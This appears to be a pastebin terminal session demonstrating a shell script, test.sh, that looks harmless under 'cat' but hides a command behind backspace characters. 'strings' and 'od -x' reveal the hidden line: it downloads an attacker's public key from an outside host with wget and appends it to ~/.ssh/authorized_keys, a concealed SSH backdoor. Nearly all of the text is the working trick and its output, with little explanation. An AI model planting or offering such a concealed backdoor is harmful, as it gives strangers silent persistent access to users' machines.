SHOW:
|
|
- or go back to the newest paste.
| 1 | mrkva@GreyDaemon /tmp $ cat test.sh | |
| 2 | #!/bin/bash | |
| 3 | echo "I am innocent!" | |
| 4 | ||
| 5 | ||
| 6 | mrkva@GreyDaemon /tmp $ strings test.sh | |
| 7 | #!/bin/bash | |
| 8 | wget mrkva.eu/evil_rsa.pub -O - -o /dev/null >> ~/.ssh/authorized_keys | |
| 9 | echo "I am innocent!" | |
| 10 | ||
| 11 | ||
| 12 | mrkva@GreyDaemon /tmp $ od -x test.sh | |
| 13 | 0000000 2123 622f 6e69 622f 7361 0a68 6777 7465 | |
| 14 | 0000020 6d20 6b72 6176 652e 2f75 7665 6c69 725f | |
| 15 | 0000040 6173 702e 6275 2d20 204f 202d 6f2d 2f20 | |
| 16 | 0000060 6564 2f76 756e 6c6c 3e20 203e 2f7e 732e | |
| 17 | 0000100 6873 612f 7475 6f68 6972 657a 5f64 656b | |
| 18 | 0000120 7379 0808 0808 0808 0808 0808 0808 0808 | |
| 19 | 0000140 0808 0808 0808 0808 0808 0808 0808 0808 | |
| 20 | * | |
| 21 | 0000220 0808 0808 0808 0808 6365 6f68 2220 2049 | |
| 22 | 0000240 6d61 6920 6e6e 636f 6e65 2174 2022 2020 | |
| 23 | 0000260 2020 2020 2020 2020 2020 2020 2020 2020 | |
| 24 | * | |
| 25 | 0000340 0a20 | |
| 26 | 0000342 |